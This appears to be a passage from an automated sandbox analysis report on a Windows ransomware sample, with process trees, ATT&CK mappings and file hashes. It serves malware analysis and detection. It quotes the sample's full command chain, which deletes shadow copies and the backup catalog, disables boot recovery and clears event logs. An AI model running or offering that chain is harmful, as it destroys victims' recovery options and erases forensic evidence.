Token: SeBackupPrivilege	1396	wevtutil.exe
Token: SeSecurityPrivilege	1148	wevtutil.exe
Token: SeBackupPrivilege	1148	wevtutil.exe
Token: SeSecurityPrivilege	2052	wevtutil.exe
Token: SeBackupPrivilege	2052	wevtutil.exe
Token: SeSecurityPrivilege	2388	wevtutil.exe
Token: SeBackupPrivilege	2388	wevtutil.exe
Token: SeShutdownPrivilege	1404	powercfg.exe
Token: SeShutdownPrivilege	1928	powercfg.exe
Token: SeShutdownPrivilege	1896	powercfg.exe
Token: SeShutdownPrivilege	1200	powercfg.exe
Token: SeIncreaseQuotaPrivilege	6976	WMIC.exe
Token: SeSecurityPrivilege	6976	WMIC.exe
Token: SeTakeOwnershipPrivilege	6976	WMIC.exe
Token: SeLoadDriverPrivilege	6976	WMIC.exe
Token: SeSystemProfilePrivilege	6976	WMIC.exe
Token: SeSystemtimePrivilege	6976	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.execmd.exe

description	pid	process	target process
PID 2860 wrote to memory of 2156	2860	08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe	cmd.exe
PID 2860 wrote to memory of 2156	2860	08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe	cmd.exe
PID 2860 wrote to memory of 2156	2860	08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe	cmd.exe
PID 2860 wrote to memory of 2156	2860	08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe	cmd.exe
PID 2156 wrote to memory of 2032	2156	cmd.exe	vssadmin.exe
PID 2156 wrote to memory of 2032	2156	cmd.exe	vssadmin.exe
PID 2156 wrote to memory of 2032	2156	cmd.exe	vssadmin.exe
PID 2860 wrote to memory of 2944	2860	08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe	A3DUtility.exe
PID 2860 wrote to memory of 2944	2860	08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe	A3DUtility.exe
PID 2860 wrote to memory of 2944	2860	08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe	A3DUtility.exe
PID 2860 wrote to memory of 2944	2860	08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe	A3DUtility.exe
PID 2860 wrote to memory of 2944	2860	08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe	A3DUtility.exe
PID 2860 wrote to memory of 2944	2860	08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe	A3DUtility.exe
PID 2860 wrote to memory of 2944	2860	08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe	A3DUtility.exe
PID 2860 wrote to memory of 2944	2860	08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe	A3DUtility.exe
PID 2860 wrote to memory of 2944	2860	08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe	A3DUtility.exe
PID 2860 wrote to memory of 2944	2860	08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe	A3DUtility.exe
PID 2860 wrote to memory of 2944	2860	08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe	A3DUtility.exe
PID 2860 wrote to memory of 2944	2860	08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe	A3DUtility.exe
PID 2156 wrote to memory of 2624	2156	cmd.exe	WMIC.exe
PID 2156 wrote to memory of 2624	2156	cmd.exe	WMIC.exe
PID 2156 wrote to memory of 2624	2156	cmd.exe	WMIC.exe
PID 2156 wrote to memory of 3052	2156	cmd.exe	bcdedit.exe
PID 2156 wrote to memory of 3052	2156	cmd.exe	bcdedit.exe
PID 2156 wrote to memory of 3052	2156	cmd.exe	bcdedit.exe
PID 2156 wrote to memory of 3056	2156	cmd.exe	bcdedit.exe
PID 2156 wrote to memory of 3056	2156	cmd.exe	bcdedit.exe
PID 2156 wrote to memory of 3056	2156	cmd.exe	bcdedit.exe
PID 2156 wrote to memory of 1048	2156	cmd.exe	wbadmin.exe
PID 2156 wrote to memory of 1048	2156	cmd.exe	wbadmin.exe
PID 2156 wrote to memory of 1048	2156	cmd.exe	wbadmin.exe
PID 2156 wrote to memory of 1396	2156	cmd.exe	wevtutil.exe
PID 2156 wrote to memory of 1396	2156	cmd.exe	wevtutil.exe
PID 2156 wrote to memory of 1396	2156	cmd.exe	wevtutil.exe
PID 2156 wrote to memory of 1148	2156	cmd.exe	wevtutil.exe
PID 2156 wrote to memory of 1148	2156	cmd.exe	wevtutil.exe
PID 2156 wrote to memory of 1148	2156	cmd.exe	wevtutil.exe
PID 2156 wrote to memory of 2052	2156	cmd.exe	wevtutil.exe
PID 2156 wrote to memory of 2052	2156	cmd.exe	wevtutil.exe
PID 2156 wrote to memory of 2052	2156	cmd.exe	wevtutil.exe
PID 2156 wrote to memory of 2388	2156	cmd.exe	wevtutil.exe
PID 2156 wrote to memory of 2388	2156	cmd.exe	wevtutil.exe
PID 2156 wrote to memory of 2388	2156	cmd.exe	wevtutil.exe
PID 2156 wrote to memory of 1272	2156	cmd.exe	fsutil.exe
PID 2156 wrote to memory of 1272	2156	cmd.exe	fsutil.exe
PID 2156 wrote to memory of 1272	2156	cmd.exe	fsutil.exe
PID 2156 wrote to memory of 1404	2156	cmd.exe	powercfg.exe
PID 2156 wrote to memory of 1404	2156	cmd.exe	powercfg.exe
PID 2156 wrote to memory of 1404	2156	cmd.exe	powercfg.exe
PID 2156 wrote to memory of 1928	2156	cmd.exe	powercfg.exe
PID 2156 wrote to memory of 1928	2156	cmd.exe	powercfg.exe
PID 2156 wrote to memory of 1928	2156	cmd.exe	powercfg.exe
PID 2156 wrote to memory of 1896	2156	cmd.exe	powercfg.exe
PID 2156 wrote to memory of 1896	2156	cmd.exe	powercfg.exe
PID 2156 wrote to memory of 1896	2156	cmd.exe	powercfg.exe
PID 2156 wrote to memory of 1200	2156	cmd.exe	powercfg.exe
PID 2156 wrote to memory of 1200	2156	cmd.exe	powercfg.exe
PID 2156 wrote to memory of 1200	2156	cmd.exe	powercfg.exe
PID 2860 wrote to memory of 2884	2860	08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe	AcroBroker.exe
PID 2860 wrote to memory of 2884	2860	08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe	AcroBroker.exe
PID 2860 wrote to memory of 2884	2860	08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe	AcroBroker.exe
PID 2860 wrote to memory of 2884	2860	08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe	AcroBroker.exe
PID 2860 wrote to memory of 2884	2860	08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe	AcroBroker.exe
PID 2860 wrote to memory of 2884	2860	08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe	AcroBroker.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe
"C:\Users\Admin\AppData\Local\Temp\08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe"
1⤵
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2860
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet & wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C: & powercfg.exe -x -standby-timeout-ac 0 & powercfg.exe -x -standby-timeout-dc 0 & powercfg.exe -x -hibernate-timeout-ac 0 & powercfg.exe -x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  - Suspicious use of WriteProcessMemory
  PID:2156
- - C:\Windows\system32\vssadmin.exe
    vssadmin delete shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:2032
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic shadowcopy delete
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2624
- - C:\Windows\system32\bcdedit.exe
    bcdedit /set {default} bootstatuspolicy ignoreallfailures
    3⤵
    - Modifies boot configuration data using bcdedit
    PID:3052
- - C:\Windows\system32\bcdedit.exe
    bcdedit /set {default} recoveryenabled no
    3⤵
    - Modifies boot configuration data using bcdedit
    PID:3056
- - C:\Windows\system32\wbadmin.exe
    wbadmin delete catalog -quiet
    3⤵
    - Deletes backup catalog
    PID:1048
- - C:\Windows\system32\wevtutil.exe
    wevtutil cl Setup
    3⤵
    - Clears Windows event logs
    - Suspicious use of AdjustPrivilegeToken
    PID:1396
- - C:\Windows\system32\wevtutil.exe
    wevtutil cl System
    3⤵
    - Clears Windows event logs
    - Suspicious use of AdjustPrivilegeToken
    PID:1148
- - C:\Windows\system32\wevtutil.exe
    wevtutil cl Security
    3⤵
    - Clears Windows event logs
    - Suspicious use of AdjustPrivilegeToken
    PID:2052
- - C:\Windows\system32\wevtutil.exe
    wevtutil cl Application
    3⤵
    - Clears Windows event logs
    - Suspicious use of AdjustPrivilegeToken
    PID:2388
- - C:\Windows\system32\fsutil.exe
    fsutil usn deletejournal /D C:
    3⤵
    PID:1272
- - C:\Windows\system32\powercfg.exe
    powercfg.exe -x -standby-timeout-ac 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:1404
- - C:\Windows\system32\powercfg.exe
    powercfg.exe -x -standby-timeout-dc 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:1928
- - C:\Windows\system32\powercfg.exe
    powercfg.exe -x -hibernate-timeout-ac 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:1896
- - C:\Windows\system32\powercfg.exe
    powercfg.exe -x -hibernate-timeout-dc 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:1200
- C:\Program Files (x86)\Adobe\Reader 9.0\Reader\A3DUtility.exe
  "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\A3DUtility.exe"
  2⤵
  - Drops startup file
  - Loads dropped DLL
  - Drops desktop.ini file(s)
  - Drops file in Program Files directory
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  PID:2944
- C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroBroker.exe
  "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroBroker.exe"
  2⤵
  - Drops startup file
  - Loads dropped DLL
  - Drops desktop.ini file(s)
  - Drops file in Program Files directory
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  PID:2884
- C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
  "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe"
  2⤵
  - Drops startup file
  - Loads dropped DLL
  - Drops file in Program Files directory
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  PID:15668
- C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32Info.exe
  "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32Info.exe"
  2⤵
  - Executes dropped EXE
  PID:12708
- C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AdobeCollabSync.exe
  "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AdobeCollabSync.exe"
  2⤵
  - Drops startup file
  - Loads dropped DLL
  - Drops file in Program Files directory
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  PID:2092
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet & wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C: & powercfg.exe -x -standby-timeout-ac 0 & powercfg.exe -x -standby-timeout-dc 0 & powercfg.exe -x -hibernate-timeout-ac 0 & powercfg.exe -x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  PID:8944
- - C:\Windows\system32\vssadmin.exe
    vssadmin delete shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:9228
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic shadowcopy delete
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:6976
- - C:\Windows\system32\bcdedit.exe
    bcdedit /set {default} bootstatuspolicy ignoreallfailures
    3⤵
    - Modifies boot configuration data using bcdedit
    PID:4468
- - C:\Windows\system32\bcdedit.exe
    bcdedit /set {default} recoveryenabled no
    3⤵
    - Modifies boot configuration data using bcdedit
    PID:4548
- - C:\Windows\system32\wbadmin.exe
    wbadmin delete catalog -quiet
    3⤵
    - Deletes backup catalog
    PID:4672
- - C:\Windows\system32\wevtutil.exe
    wevtutil cl Setup
    3⤵
    - Clears Windows event logs
    PID:5596
- - C:\Windows\system32\wevtutil.exe
    wevtutil cl System
    3⤵
    - Clears Windows event logs
    PID:6616
- - C:\Windows\system32\wevtutil.exe
    wevtutil cl Security
    3⤵
    - Clears Windows event logs
    PID:15584
- - C:\Windows\system32\wevtutil.exe
    wevtutil cl Application
    3⤵
    - Clears Windows event logs
    PID:8668
- - C:\Windows\system32\fsutil.exe
    fsutil usn deletejournal /D C:
    3⤵
    PID:5708
- - C:\Windows\system32\powercfg.exe
    powercfg.exe -x -standby-timeout-ac 0
    3⤵
    - Power Settings
    PID:8288
- - C:\Windows\system32\powercfg.exe
    powercfg.exe -x -standby-timeout-dc 0
    3⤵
    - Power Settings
    PID:6016
- - C:\Windows\system32\powercfg.exe
    powercfg.exe -x -hibernate-timeout-ac 0
    3⤵
    - Power Settings
    PID:6100
- - C:\Windows\system32\powercfg.exe
    powercfg.exe -x -hibernate-timeout-dc 0
    3⤵
    - Power Settings
    PID:12948

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1784

C:\Windows\system32\wbengine.exe
"C:\Windows\system32\wbengine.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1588

C:\Windows\System32\vdsldr.exe
C:\Windows\System32\vdsldr.exe -Embedding
1⤵
PID:1864

C:\Windows\System32\vds.exe
C:\Windows\System32\vds.exe
1⤵
PID:1996

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Windows Management Instrumentation

T1047

Persistence

Power Settings

T1653

Privilege Escalation

Defense Evasion

Direct Volume Access

T1006

Indicator Removal

T1070

Clear Windows Event Logs

T1070.001

File Deletion

T1070.004

Credential Access

Credentials from Password Stores

T1555

Windows Credential Manager

T1555.004

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\FILES.TXT

Filesize
1KB

MD5
7fd2214952bfbc04f5e1f4e89ede92c2

SHA1
d619aee73f89b2f3440a63ec79fab23f37573f53

SHA256
6543ad7d8b6701448a45072b2133bb24dc53a23247e1815a8e6d9bfe9cfc28c6

SHA512
f5881a220a6a2d3b2fed0c79b91cbecbe43d2106d21273be74e0df92c16e61a2451157904db5dfe79b9a15a731aa0f3cc93bc3025ca85ba4b3b4603280e5f25b

Download Submit
C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PARNT_09.MID

Filesize
7KB

MD5
5f3776bf3d81d4aa6fbc0b4cf0243c52

SHA1
fb1cb7f3612e64e9ab60606f5bc53043162e5f99

SHA256
c8af23a723279bce74bf8d4e4d7acd72f8f2e2df4fb4b78828798a774ec51065

SHA512
06ba2f9faad5989296e52af6828130d8d5aa20be71339ba047340866c61a0ed93cb2af845b32c294a16f74d02a834e436482d63907195cc5ba0458913475ac7f

Download Submit
C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Choibalsan

Filesize
1KB

MD5
1a623699d86b1d5131e3afd2c6df213e

SHA1
2db2be794990f697bd403879dd31ed1d6614f100

SHA256
e760a6826149f4f14c8d11bafbf5b472609626e3d8efc4c8bab03ce86fa5d558

SHA512
130a3a1c330cf860bcfebc8d6c280debe799ae6d6751e18fe2913999195f075258e7b7252797ac326b0a5382ae827311622738aff34c39d539f2a0a8fb257a64

Download Submit
C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\HST10

Filesize
992B

MD5
77a3bbe6b3e65676543f645fee62b749

SHA1
58a77f60ec20f5c600a93796fd3195ebc319e77c

SHA256
f40e833fdcb479c1700f4e5020cfa6f4dbe2f52d51eb819f113ec1379d851734

SHA512
e4e323f6822c5f758906f92643786565905e0e54097468318bcf4bdd3413615450debc64aaa69291b39a7f47e369f6190ad0c9fda2b11c24a5171251ff2de93e

Download Submit
C:\ProgramData\Microsoft\Assistance\Client\1.0\it-IT\Help_MKWD_BestBet.H1W

Filesize
422KB

MD5
21f965a780a55c0f6233120706151e77

SHA1
775d33f4511b7fac71f4af2c2dfb1e2b5281bb41

SHA256
86dbca0fae2ea3d5701129ceb9b20a2c07e0161f45a855a470c4b718ce66257f

SHA512
3deb2bafa83e54549842aabef9085ef6ec1dbf9ec9bc18fee1561f1bc6a76b88bb93328a1bbf93f72cd4d3f74de63cf19868f79b159ca0c7cc7e4223a05057a6

Download Submit
C:\ProgramData\Microsoft\Assistance\Client\1.0\it-IT\Help_MTOC_help.H1H

Filesize
531KB

MD5
29ae914d3930e43448e13f8a37de7f85

SHA1
15d536feb5ce570c764db0a89996f1bf6e09568d

SHA256
6089b4f419b93270f855000ec32c5cf6049a2ddd14d90d8e6bb94724639b6a8b

SHA512
40af6fa234438e26039dd7e735adfa8d3d7a3d5dec67eecd7d6a577e8be5795734abbc20f005082ead181f020274289bfaef76e76f0c3aba36b4079618ab51b9

Download Submit
C:\ProgramData\Microsoft\Assistance\Client\1.0\it-IT\Help_MValidator.H1D

Filesize
15KB

MD5
38a0a1717aa07c38a76c7ba5deb38fcb

SHA1
2adabb6a605496112ada1ca77c364f40630b42a1

SHA256
9457e647713ab965ff8e12d6ef1615c68f55076e757167a75a7ccdb55e927210

SHA512
06b482241a4c461b5caefe9569d5436ff6cf2f9fe09102edcc850e956614d9d20d451bd753aeee7113838164ea8a1d1605f938f9dcf15b73c4de87b976a3e0db

Download Submit
C:\ProgramData\Microsoft\Assistance\Client\1.0\it-IT\Help_MValidator.Lck

Filesize
656B

MD5
ada6a0f6dd5ef67b91b247861717bcb5

SHA1
4cbe1608642677dbb28a824956cf3137e0c9928d

SHA256
bfd3a9136ab2983e213370dfcf9033c34620b34f5302de0b4f1725520447c77c

SHA512
69a5ae25919f40e269675ef0c8e12e16980500bf751231b527cf03e87b3a515dfd2d712d1c15be738c640036d6f28621ea71dacd97ed48fc77c9ae746a33921e

Download Submit
C:\ProgramData\Microsoft\Assistance\Client\1.0\it-IT\Help{7E352021-69D6-4553-86AC-430B0D8FF913}.H1Q

Filesize
1.0MB

MD5
0633ab1f1760df302427c21fb97c068e

SHA1
5398efde9a05fc151296848374e2d2ea7984d046

SHA256
3fe91e33b27971d27671d111a32070f2aa6f7812d8bdd1a3bfbc041543984ea5

SHA512
a0ce5cf7217a45d1e1ce7fec43d11fbb3a58f9c50169909521bcf86207e59b6b9034b1f39b110aeab6e3444b1676f28f6151a3e295f2e9dae0d8fc98c4d05a8d

Download Submit
C:\Users\Admin\AppData\Local\Temp\lnlfdxfirc

Filesize
52KB

MD5
54ea0bc0970fadc80d5c7323b344390a

SHA1
e964521b9c2452e7b548649e578730874ad23a95

SHA256
49ee2e2240438a44d100c504975755c72f0dbfdff4d998202d0ed62624bbf782

SHA512
d0e31e5901491554deb1deb852769a2ccd56eb2fc2e80c41ee2bbfd313fc35c1804df2ead642914b588b5b5095b72fc8f49008980dcc5f9758bb2f279ed500f9

Download Submit
C:\Users\Admin\AppData\Local\Temp\lnlfdxfirc

Filesize
70KB

MD5
9fc32e115dbc5c36eda1e6d37556b8f0

SHA1
84743ffdbd06a601cb18e95e0cff4c6ce6947e5a

SHA256
16d5772f37483c481c08732a67651886be717616fa3f8be0bc6130b93fd6dae7

SHA512
078def9066f979e188c06fe342f8cf2e31e874235a1be7df3cf2bd0b3dfc10aa11c564c2b92a5e3588b85193b117ab51dc538173cef85efdeeaff192a4439449

Download Submit
C:\Users\Admin\AppData\Local\Temp\lnlfdxfirc

Filesize
70KB

MD5
5b2358f9595c7b0cc48558ae577b1008

SHA1
afa18941bc449a12c27e29ecb6e9d15e12a0a767

SHA256
7940bfb3a33b403e42c1698b86b5f0172b874f48d7f2b8c49f23dad5ae407a37

SHA512
7055382bbd16b20995ad96e1c49a9887bfb4590743becfc9d57757e60f4c08c5819525812f87d7a46fec55b4f1b9e66191c35040525bd8cae36ed472d905dafe

Download Submit
C:\Users\Admin\AppData\Local\Temp\mleafhtnnn

Filesize
60KB

MD5
b9a9226b7770dbbaa803f01edb6e97e7

SHA1
a61dcfb098247561a3b04b3a717f4f1a01599eff

SHA256
fc7b04b7744e67b422541bc63f105fe20f9b805c40ac7b5418c15d3aff543ba6

SHA512
380b7400ebc7dcc378cb6210557ae19185f89065853dc7583d357060c9409f7fa29d4ae2f2987eda805184c30a5a2affa9d3d7b98efd7b04fd29bdf51fddbc3d

Download Submit
C:\Users\Admin\AppData\Local\Temp\vscxggbwkf

Filesize
57KB

MD5
57c4f841aceaf74711d58444d06dca4a

SHA1
bb2e43ce1d7a25c3cfb981e4ec20ac03005b9cbe

SHA256
c43e630192ecce243b8aa7f1ec826ddf88c7ebbf56c1e49b1f98f8ec6c6726d4

SHA512
f6ae64650ad2c27423e33f81401401b086a7dfa214395fa469124610a90caef3775ed76da62a2b3f4ce2be0d5ca7596ce4255181388a3842af03c05a885401bb

Download Submit
C:\Users\Admin\AppData\Local\Temp\zdlpyeywxb

Filesize
57KB

MD5
55722e6bb92a1f57c5c060cf02cc77d2

SHA1
89b320e6efa69ec37e737d0c694e448b1192210f

SHA256
ef3ca5cd10eba89964e07429fc2dc45ee47dbfa9a769977b21edbba8de2f150c

SHA512
7dacbadad12a1e0d51d3187cba97c18e2ace4c501fe5903e27c6553fd1afba744eff1b5800d376bdcb595ac5f683e90ca57672a73082264120adcc54d0c5cdef

Download Submit
C:\Users\Admin\AppData\Local\Temp\zwajwhogqm

Filesize
52KB

MD5
62b9beff79dffd3102ee6633c80d42d3

SHA1
a3fc284d860b6b24d98bfd89475e09eef5d1a31b

SHA256
b329a93b95706de5bec9d166206214b478328304af336f45f5f626cf2bf66b4c

SHA512
9add0e4ddc202bba5d0871130af3d0af983394ff684bd1bf5406a90f396468aeaf8306b4059b36bb20171f37e7da83d38d5047f56acbec94bfc77be6380fd1cc

Download Submit
F:\$RECYCLE.BIN\S-1-5-21-1488793075-819845221-1497111674-1000\desktop.ini

Filesize
464B

MD5
1bc90d4dc4f6bde1d9feb797420c3947

SHA1
263ecf3e18082c10c41d6f672df069c862fc7fdf

SHA256
5aba49b72121d70e36a1031203406ef5c38821f741f2d488e5b3498e8ea86dd1

SHA512
0fe369c2a9ff51762e2408fca6cff58cd0f6e7aab23d6dbcacdbe18d9cd82ea2925c57ce5b68233299f5ae9219ffeac5eff59f4fc4ea0d9a2ebc1c0dc4aec279

Download Submit
memory/2884-3056-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

Filesize
4KB

Download
memory/2944-23-0x0000000000400000-0x0000000000498000-memory.dmp

Filesize
608KB

Download
memory/2944-94-0x0000000000400000-0x0000000000498000-memory.dmp

Filesize
608KB

Download
memory/2944-108-0x0000000000400000-0x0000000000498000-memory.dmp

Filesize
608KB

Download
memory/2944-107-0x0000000000400000-0x0000000000498000-memory.dmp

Filesize
608KB

Download
memory/2944-104-0x0000000000400000-0x0000000000498000-memory.dmp

Filesize
608KB

Download
memory/2944-100-0x0000000000400000-0x0000000000498000-memory.dmp

Filesize
608KB

Download
memory/2944-96-0x0000000000400000-0x0000000000498000-memory.dmp

Filesize
608KB

Download
memory/2944-170-0x0000000000400000-0x0000000000498000-memory.dmp

Filesize
608KB

Download
memory/2944-2466-0x0000000000400000-0x0000000000498000-memory.dmp

Filesize
608KB

Download
memory/2944-2488-0x0000000000400000-0x0000000000498000-memory.dmp

Filesize
608KB

Download
memory/2944-2481-0x0000000000400000-0x0000000000498000-memory.dmp

Filesize
608KB

Download
memory/2944-2470-0x0000000000400000-0x0000000000498000-memory.dmp

Filesize
608KB

Download
memory/2944-2469-0x0000000000400000-0x0000000000498000-memory.dmp

Filesize
608KB

Download
memory/2944-2468-0x0000000000400000-0x0000000000498000-memory.dmp

Filesize
608KB

Download
memory/2944-2467-0x0000000000400000-0x0000000000498000-memory.dmp

Filesize
608KB

Download
memory/2944-2465-0x0000000000400000-0x0000000000498000-memory.dmp

Filesize
608KB

Download
memory/2944-119-0x0000000000400000-0x0000000000498000-memory.dmp

Filesize
608KB

Download
memory/2944-112-0x0000000000400000-0x0000000000498000-memory.dmp

Filesize
608KB

Download
memory/2944-113-0x0000000000400000-0x0000000000498000-memory.dmp

Filesize
608KB

Download
memory/2944-97-0x0000000000400000-0x0000000000498000-memory.dmp

Filesize
608KB

Download
memory/2944-4-0x0000000000400000-0x0000000000498000-memory.dmp

Filesize
608KB

Download
memory/2944-20218-0x0000000000400000-0x0000000000498000-memory.dmp

Filesize
608KB

Download
memory/2944-22-0x0000000000400000-0x0000000000498000-memory.dmp

Filesize
608KB

Download
memory/2944-2-0x0000000000400000-0x0000000000498000-memory.dmp

Filesize
608KB

Download
memory/2944-0-0x0000000000400000-0x0000000000498000-memory.dmp

Filesize
608KB

Download
memory/2944-6-0x0000000000400000-0x0000000000498000-memory.dmp

Filesize
608KB

Download
memory/2944-8-0x0000000000400000-0x0000000000498000-memory.dmp

Filesize
608KB

Download
memory/2944-12-0x0000000000400000-0x0000000000498000-memory.dmp

Filesize
608KB

Download
memory/2944-14-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

Filesize
4KB

Download
memory/2944-16-0x0000000000400000-0x0000000000498000-memory.dmp

Filesize
608KB

Download
memory/2944-19-0x0000000000400000-0x0000000000498000-memory.dmp

Filesize
608KB

Download
memory/2944-18-0x0000000000400000-0x0000000000498000-memory.dmp

Filesize
608KB

Download
memory/2944-10-0x0000000000400000-0x0000000000498000-memory.dmp

Filesize
608KB

Download
memory/2944-32405-0x0000000000400000-0x0000000000498000-memory.dmp

Filesize
608KB

Download